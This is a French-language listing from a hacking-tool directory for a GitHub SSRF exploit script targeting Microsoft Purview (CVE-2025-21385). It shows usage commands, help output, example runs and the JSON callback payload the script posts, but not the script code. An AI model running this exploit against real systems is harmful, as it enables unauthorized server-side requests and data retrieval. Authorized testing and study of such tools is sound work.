Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-21385 — La vulnérabilité SSRF dans Microsoft Purview | Kitploit
Outils/GitHubGitHub/pauloxc6/cve-2025-21385
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubpauloxc6/cve-2025-21385

CVE-2025-21385

La vulnérabilité SSRF dans Microsoft Purview

Voir le dépôt
21il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Script d'exploitation SSRF

Ce dépôt contient un script conçu pour effectuer une exploitation SSRF (Server-Side Request Forgery) à des fins de test et d'éducation. Utilisez cet outil de manière responsable et uniquement dans des environnements où vous avez une autorisation explicite.

Fonctionnalités

  • Exploiter les vulnérabilités SSRF dans les systèmes cibles.
  • Valider les URL d'entrée pour éviter les mauvais usages.
  • Interface CLI facile à utiliser avec des messages d'erreur clairs et un menu d'aide.

Prérequis

  • bash (Unix shell)
  • jq (JSON processor)
  • curl (Command-line tool for HTTP requests)

Utilisation

Syntaxe

root@kitploit:~
./script.sh --exploit <target_url> <purview_url>

Options

Télécharger l’outil
OptionDescription
-h, --helpAfficher le menu d'aide.
--exploit tu puEffectuer l'exploitation SSRF avec l'URL cible et l'URL de référence (purview).

Exemples

Afficher le menu d'aide

root@kitploit:~
./script.sh -h

Output:

root@kitploit:~
Usage:
./script.sh --exploit <target_url> <purview_url>

Options:
-h, --help       - Show this help menu
--exploit <tu> <pu> - Perform the SSRF exploit with target and purview URLs

Effectuer l'exploitation SSRF

root@kitploit:~
./script.sh --exploit http://example.com http://purview-url.com

Expected Output:

  • En cas de succès :
    root@kitploit:~
    SSRF exploit successful! Data retrieved:
    <response data>
    
  • En cas d'échec :
    root@kitploit:~
    SSRF exploit failed! HTTP code: <code>
    

Flux de travail du script

  1. Le script analyse les arguments fournis.
  2. Valide la correction des URL fournies.
  3. Envoie une requête HTTP POST avec une charge utile JSON à l'purview_url, tentant d'exploiter une vulnérabilité SSRF.
  4. Affiche la réponse HTTP ou un message d'erreur en fonction du résultat.

Exemple de flux de travail

Entrée

root@kitploit:~
./script.sh --exploit http://callback-url.com http://vulnerable-purview-url.com

Charge utile envoyée

root@kitploit:~
{
  "callback": "http://callback-url.com"
}

Gestion de la réponse

Le code et le corps de la réponse HTTP sont enregistrés, et en fonction du code d'état, le succès ou l'échec de l'exploitation est déterminé.

Gestion des erreurs

  • Si des arguments invalides ou manquants sont détectés, le script fournit des instructions détaillées via le menu d'aide.
  • Si les URL sont mal formées, un message d'erreur s'affiche et l'exécution s'arrête.

Notes de développement

Ce script est uniquement destiné à des fins de test. Une mauvaise utilisation de ce script peut entraîner de graves conséquences juridiques. Assurez-vous de respecter toutes les lois applicables et les normes éthiques.

Contribution

N'hésitez pas à contribuer en créant des pull requests ou en signalant des problèmes.

Licence

GNU GPL v3


Avertissement

Cet outil est destiné uniquement à des fins éducatives et à des tests de pénétration autorisés. L'auteur n'est pas responsable de toute mauvaise utilisation ou de tout dommage causé par cet outil.